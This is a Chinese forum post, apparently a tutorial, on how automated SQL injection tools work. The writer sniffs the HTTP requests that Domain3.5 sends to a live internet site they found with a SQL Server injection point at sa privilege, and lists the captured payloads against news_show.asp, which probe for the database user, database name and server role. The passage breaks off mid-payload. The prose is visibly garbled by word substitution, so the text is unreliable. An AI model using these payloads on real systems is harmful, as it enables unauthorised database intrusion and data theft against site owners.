|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
提供用于管理、检查、优化数据库操作的管理工具。</p>想懂得sql注进的历程和道理,网上找了些文章,讲得都对照浅薄,可是我晓得有几款国际对照经常使用的注进工具,好比Domain3.5、NBSI3.0、啊D2.32、另有Pangolin、另有一些外洋的。这里任意弄几个来研讨一下就ok。此次用到的嗅探工具是sniffx专门嗅探http的数据包,功效不壮大,可是充足此次举动的利用。原本想利用ethereal或wireshark,可是内里复制数据包内容总是把没有转码的16进制也复制了过去,有点贫苦。也就是说这两个工具用得不纯熟。
【查询数据库信息】
当地没有找到好点的有注进毛病的体系,只幸亏网上寻觅了,先用Domain3.5,运转很好以来就找到个sqlserver,sa权限的注进点,点Domain3.5下面的“入手下手检测”
以下是Domain3.5中嗅探出来的http数据包:
news_show.asp?id=15618%20and%201=1
news_show.asp?id=15618%20and%201=2
news_show.asp?id=15618%20and%20exists%20(select%20*%20from%20sysobjects)
news_show.asp?id=15618%20and%20char(124)%2Buser%2Bchar(124)=0
news_show.asp?id=15618;declare%20@a%20int–
news_show.asp?id=15618%20and%20char(124)%2Bdb_name()%2Bchar(124)=0
news_show.asp?id=15618%20And%20IS_SRVROLEMEMBER(0 |
|